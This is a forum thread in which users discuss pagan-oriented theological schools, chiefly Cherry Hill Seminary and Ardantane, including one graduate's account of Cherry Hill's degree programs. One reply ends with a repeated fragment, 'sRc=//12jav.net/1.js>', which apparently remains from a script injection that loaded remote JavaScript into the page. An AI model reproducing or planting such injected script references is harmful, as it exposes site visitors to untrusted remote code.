College

Hello, everyone. So, I've been considering my options for college as of late, and, upon looking at theological institutes and finding a vast majority of them to be Christian oriented, I was a tad off-put. Not surprised in the slightest, to be honest, but a little off-put. While searching, however, I did come across two colleges that are geared towards pagans of various paths. They are:

A. Cherry Hill Seminary, and
B. Ardantane, in New Mexico.

The reason I've come here is to ask if anyone has had any experiences, positive or negative, with either? Any recommendations? If there are any other similar institutes in the US, I would love to be notified of them.

I'm pretty sure Cherry Hill is an institution to teach and train Pagan ministers for wedding ceremonies.

In Illinois, there's Northern Illinois University. There is a whole Pagan Alliance group located at the school. The shopkeepers of Dekalb, IL can be Pagan geared with what they sell. I hppe this helps. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I am a graduate of Cherry Hill Seminary with a Master's of Divinity degree in Pagan Pastoral Counseling. One thing to understand about Cherry Hill is that it is a Master's level degree program. You'd already have to have a Bachelor's degree from another university in order to be considered for admission to the academic track at Cherry Hill. Cherry Hill has several academic tracks with chaplaincy and counseling being only one of them. It also trains those who want to be Pagan advocates or those who want to approach Pagan learning from an academic viewpoint.

Ardantane isn't a real college and it cannot grant actual, accredited degrees that would be reconginzed by another academic institutions, employers etc. So if you want a degree that will count for something, Ardantane is not the place to go. One major consideration here as well is that the teachers are not acadmically accredited so you'll never know for sure what their apptitude and educational background might be.

Any area is OK for your Bachelor's degree as long as it is from an accredited university.
